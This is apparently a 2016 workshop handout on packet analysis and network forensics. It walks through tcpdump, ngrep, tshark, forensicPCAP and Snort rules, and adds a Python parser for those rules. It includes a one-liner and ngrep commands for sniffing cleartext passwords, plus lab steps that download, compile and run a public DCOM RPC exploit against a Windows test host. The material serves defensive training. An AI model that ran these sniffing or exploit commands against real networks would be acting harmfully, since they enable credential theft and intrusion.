joemccray

Packet Analysis/Network Forensics

Aug 10th, 2016
##########
# VMware #
##########
- For this workshop you'll need the latest version of VMware Workstation (Windows), Fusion (Mac), or Player.

- http://www.vmware.com/ap/products/player.html


- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.



#########################
# Class Virtual Machine #
#########################


Here is the VMware virtual machine for the class:

https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts


#################
# PCAP Analysis #
#################
---------------------------Type This-----------------------------------
cd ~/Desktop/

mkdir suspiciouspcap/

cd suspiciouspcap/

wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap

wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl


perl chaosreader.pl suspicious-time.pcap

firefox index.html

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr


for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
------------------------------------------------------------------------



####################
# Intro to TCPDump #
####################
---------------------------Type This-----------------------------------
sudo apt-get install tcpdump
------------------------------------------------------------------------



Basic sniffing
--------------
---------------------------Type This-----------------------------------
sudo tcpdump -n
------------------------------------------------------------------------


Now let's increase the level of detail shown for each packet. The verbose switch comes in handy:
---------------------------Type This-----------------------------------
sudo tcpdump -v -n
------------------------------------------------------------------------



Getting the Ethernet header (link layer headers)
------------------------------------------------
In the above examples the details of the Ethernet header are not printed. Use the -e option to print the Ethernet header details as well.
---------------------------Type This-----------------------------------
sudo tcpdump -vv -n -e
------------------------------------------------------------------------

Sniffing a particular interface
-------------------------------
In order to sniff a particular network interface we must specify it with the -i switch. First, let's get the list of available interfaces using the -D switch.
---------------------------Type This-----------------------------------
sudo tcpdump -D
------------------------------------------------------------------------

Filtering packets using expressions - Selecting protocols
---------------------------------------------------------
---------------------------Type This-----------------------------------
$ sudo tcpdump -n tcp
------------------------------------------------------------------------

Particular host or port
-----------------------
Expressions can be used to specify the source IP, destination IP, and port numbers. The next example picks up all packets with source address 192.168.1.101:
---------------------------Type This-----------------------------------
$ sudo tcpdump -n 'src 192.168.1.101'
------------------------------------------------------------------------

The next example picks up DNS request packets: those which originate from the local machine and go to port 53 of some other machine.
---------------------------Type This-----------------------------------
$ sudo tcpdump -n 'udp and dst port 53'
------------------------------------------------------------------------

To display the FTP packets going from 192.168.1.100 to 192.168.1.2:
---------------------------Type This-----------------------------------
$ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
------------------------------------------------------------------------

Search the network traffic using grep
-------------------------------------
grep can be used along with tcpdump to search the network traffic. Here is a very simple example:
---------------------------Type This-----------------------------------
$ sudo tcpdump -n -A | grep -e 'POST'
------------------------------------------------------------------------

So what is the idea behind searching packets? Well, one use is to sniff passwords.
Here is a quick example to sniff passwords using egrep:

---------------------------Type This-----------------------------------
tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
------------------------------------------------------------------------



#########
# NGrep #
#########

Install ngrep on Ubuntu
---------------------------Type This-----------------------------------
$ sudo apt-get install ngrep
------------------------------------------------------------------------

Search network traffic for the string "User-Agent: "
---------------------------Type This-----------------------------------
$ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
------------------------------------------------------------------------
In the above command:
a) tcp and port 80 - is the BPF (Berkeley Packet Filter) expression; it captures only TCP packets with port number 80.
b) The -d option specifies the interface to sniff, eth0 in this case.
c) "User-Agent: " is the string to search for. All packets that contain that string are displayed.

Search network packets for GET or POST requests:
---------------------------Type This-----------------------------------
$ sudo ngrep -l -q -d eth0 "^GET |^POST " tcp and port 80
------------------------------------------------------------------------
The -l option makes the output line buffered and the -q option is for quiet mode (be quiet; don't output any information other than packet headers and their payloads, if relevant).

ngrep without any options would simply capture all packets.
---------------------------Type This-----------------------------------
$ sudo ngrep
------------------------------------------------------------------------

Reference:
https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
---------------------------Type This-----------------------------------
$ sudo ngrep -d eth0 -n 3

$ sudo ngrep -d any port 25
------------------------------------------------------------------------

The second command will let you monitor all activity crossing source or destination port 25 (SMTP).
---------------------------Type This-----------------------------------
$ sudo ngrep -wi -d wlan0 'user|pass' port 6667

$ sudo ngrep -wi -d any 'user|pass' port 21
------------------------------------------------------------------------



#############################
# PCAP Analysis with tshark #
#############################
---------------------------Type This-----------------------------------
sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs


tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u


tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u


tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'


tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq


tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq

tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"


whois rapidshare.com.eyu32.ru

whois sploitme.com.cn


tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------



######################################
# PCAP Analysis with forensicPCAP.py #
######################################
---------------------------Type This-----------------------------------
cd ~/Desktop/suspiciouspcap/

wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py

sudo pip install cmd2==0.7.9


python forensicPCAP.py suspicious-time.pcap
------------------------------------------------------------------------


---------------------------Type This-----------------------------------
ForPCAP >>> help
------------------------------------------------------------------------

Prints stats about the PCAP
---------------------------Type This-----------------------------------
ForPCAP >>> stat
------------------------------------------------------------------------

Prints all DNS requests from the PCAP file. The id before each DNS request is the packet's id, which can be used with the "show" command.
---------------------------Type This-----------------------------------
ForPCAP >>> dns

ForPCAP >>> show
------------------------------------------------------------------------

Prints all destination ports from the PCAP file. The id before each port is the packet's id, which can be used with the "show" command.
---------------------------Type This-----------------------------------
ForPCAP >>> dstports

ForPCAP >>> show
------------------------------------------------------------------------

Prints the number of source IPs and stores them.
---------------------------Type This-----------------------------------
ForPCAP >>> ipsrc

ForPCAP >>> show
------------------------------------------------------------------------

Prints the number of web requests and stores them.
---------------------------Type This-----------------------------------
ForPCAP >>> web

ForPCAP >>> show
------------------------------------------------------------------------


Prints the number of mail requests and stores them.
---------------------------Type This-----------------------------------
ForPCAP >>> mail

ForPCAP >>> show
------------------------------------------------------------------------





#############################
# Understanding Snort rules #
#############################
Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)

Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)

Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)

Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)

Field 5: Traffic Direction (->)

Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)

Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)

Field 8: MSG - what is actually displayed on the analyst's machine


Let's look at 2 simple rules
----------------------------------------------------------------------------------
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator \
bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; \
content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 \
00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; \
reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivator bind \
attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; \
depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c \
00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; \
distance:0; within:1; content:"|0b|"; distance:1; within:1; \
byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
sid:2193; rev:1;)
----------------------------------------------------------------------------------


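As an added example (my own code, not part of the original handout or of Snort), here is a small Python parser that pulls the seven header fields listed above and the options out of a rule, handling the backslash line continuations and the |hex| content notation; the input string is the first rule above, everything else is assumed.

```python
import re

# Constructed input: the first rule quoted above, backslash line continuations included.
RULE_2192 = r'''alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator \
bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; \
content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 \
00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; \
reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)'''

# Fields 1-7 of the rule header, in the order the handout lists them; field 8 (msg) is an option.
HEADER_FIELDS = ("action", "protocol", "src_ip", "src_port", "direction", "dst_ip", "dst_port")
HEADER_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)$", re.S)

def join_continuations(text):
    """Drop 'backslash + newline' so a rule written over several lines becomes one line."""
    return re.sub(r"\\\s*\n\s*", "", text)

def split_options(body):
    """Split 'key:value; key:value; ...' into (key, value) pairs; a ';' inside double
    quotes (e.g. in msg) belongs to the value and is not a separator."""
    opts, buf, in_quote = [], "", False
    for ch in body + ";":  # the extra ';' flushes the last option
        if ch == '"':
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            if buf.strip():
                key, _, val = buf.strip().partition(":")
                opts.append((key.strip(), val.strip()))
            buf = ""
        else:
            buf += ch
    return opts

def content_to_bytes(value):
    """Decode a content value: text between '|' pairs is hex, text outside is literal
    ASCII, so "|FF|SMB|25|" becomes b'\\xffSMB%' (0x25 is '%')."""
    out = b""
    for i, part in enumerate(value.strip('"').split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("ascii")
    return out

def parse_rule(text):
    """Return the seven header fields plus msg, sid and the decoded content patterns."""
    m = HEADER_RE.match(join_continuations(text).strip())
    if not m:
        raise ValueError("not a Snort rule: header fields or option parentheses missing")
    rule = dict(zip(HEADER_FIELDS, m.groups()[:7]))
    opts = split_options(m.group(8))
    rule["options"] = opts
    rule["msg"] = next(v.strip('"') for k, v in opts if k == "msg")
    rule["sid"] = int(next(v for k, v in opts if k == "sid"))
    rule["contents"] = [content_to_bytes(v) for k, v in opts if k == "content"]
    return rule
```

Decoding the content patterns this way shows what the rule actually looks for on the wire: the DCERPC bind request bytes 0x05 and 0x0b followed by the 16-byte ISystemActivator interface UUID, which is why the rule fires on a bind attempt and not on arbitrary port 135 traffic.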
From your Linux machine ping your Windows machine
---------------------------Type This-----------------------------------
ping 192.168.150.1
------------------------------------------------------------------------


Start Wireshark and let's create some simple filters:

Filter 1:
---------------------------Type This-----------------------------------
ip.addr==192.168.150.1
------------------------------------------------------------------------

Filter 2:
---------------------------Type This-----------------------------------
ip.addr==192.168.150.1 && icmp
------------------------------------------------------------------------


Filter 3:
---------------------------Type This-----------------------------------
ip.addr==192.168.150.1 && !(tcp.port==22)
------------------------------------------------------------------------
Now stop your capture and restart it (make sure you keep the filter)



Back to your Linux machine:
[ CTRL-C ] - to stop your ping
---------------------------Type This-----------------------------------
wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c


gcc -o exploit oc192-dcom.c

./exploit


./exploit -d 192.168.150.1 -t 0
------------------------------------------------------------------------



Now go back to Wireshark and stop the capture.



###############################################
# Packet Analysis/Network Forensics Challenge #
###############################################

In order to receive your certificate of proficiency you must complete all of the tasks covered in the Packet Analysis/Network Forensics pastebin (http://pastebin.com/SwgnkAhQ).

Submit the results via email as an MS Word document (naming convention example: YourFirstName-YourLastName-PA-NF-Challenge.docx).



IMPORTANT NOTE:
Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and kasheia-at-strategicsec-.-com) by Sunday October 23rd at midnight EST.